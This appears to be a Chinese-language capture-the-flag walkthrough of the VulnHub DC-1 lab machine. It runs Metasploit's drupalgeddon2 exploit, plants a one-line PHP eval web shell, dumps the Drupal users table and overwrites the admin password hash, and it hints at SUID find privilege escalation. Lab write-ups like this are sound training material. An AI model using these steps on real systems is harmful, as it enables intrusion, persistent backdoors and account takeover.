靶机获取地址：https://www.vulnhub.com/entry/dc-1,292/

arp-scan -l

## robots.txt## This file is to prevent the crawling and indexing of certain parts# of your site by web crawlers and spiders run by sites like Yahoo!# and Google. By telling these "robots" where not to go on your site,# you save bandwidth and server resources.## This file will be ignored unless it is at the root of your host:# Used:    http://example.com/robots.txt# Ignored: http://example.com/site/robots.txt## For more information about the robots.txt standard, see:# http://www.robotstxt.org/wc/robots.html## For syntax checking, see:# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *Crawl-delay: 10# DirectoriesDisallow: /includes/Disallow: /misc/Disallow: /modules/Disallow: /profiles/Disallow: /scripts/Disallow: /themes/# FilesDisallow: /CHANGELOG.txtDisallow: /cron.phpDisallow: /INSTALL.mysql.txtDisallow: /INSTALL.pgsql.txtDisallow: /INSTALL.sqlite.txtDisallow: /install.phpDisallow: /INSTALL.txtDisallow: /LICENSE.txtDisallow: /MAINTAINERS.txtDisallow: /update.phpDisallow: /UPGRADE.txtDisallow: /xmlrpc.php# Paths (clean URLs)Disallow: /admin/Disallow: /comment/reply/Disallow: /filter/tips/Disallow: /node/add/Disallow: /search/Disallow: /user/register/Disallow: /user/password/Disallow: /user/login/Disallow: /user/logout/# Paths (no clean URLs)Disallow: /?q=admin/Disallow: /?q=comment/reply/Disallow: /?q=filter/tips/Disallow: /?q=node/add/Disallow: /?q=search/Disallow: /?q=user/password/Disallow: /?q=user/register/Disallow: /?q=user/login/Disallow: /?q=user/logout/

searchsploit Drupal 7

msfconsole    ##启动msfsearth Drupal    ##搜索Drupal

use unix/webapp/drupal_drupalgeddon2  ## 使用unix/webapp/drupal_drupalgeddon2模块show options  ## 查看参数配置set rhosts 192.168.183.132  ## 设置目标ipexploit ## 进行利用

Every good CMS needs a config file - and so do you.每个好的CMS都需要一个配置文件——你也一样。

echo '<?php @eval($_POST['cc123']);?>'>>./shell.php

* flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? *暴力破解和字典攻击不是获得访问权限的唯一方法(你将需要访问)。  你能用这些证书做什么?  

python -c 'import pty;pty.spawn("/bin/bash")'   #获得交互式shellmysql -u dbuser -p       #连接数据库show databases;use drupaldb;show tables;select * from users;

./scripts/password-hash.sh 123456

update users set pass="$S$DErVsVSc02xOCsBX4bFsyCV3trcSz11VWqd.w5370Z.DYafvjanD" where name="admin";

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.特殊的PERMS将帮助查找密码—但是您需要 —exec 命令来发现隐藏部分。

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy.  Or maybe it is?您可以使用相同的方法在根目录中查找或访问该标志吗?  可能。但也许事情没那么简单。也许是吧?

Well done!!!!Hopefully you've enjoyed this and learned some new skills.You can let me know what you thought of this little journeyby contacting me via Twitter - @DCAU7做得好! ! ! !  希望你喜欢这篇文章并学到了一些新技能。你可以告诉我你对这次旅行的看法  通过Twitter @DCAU7联系我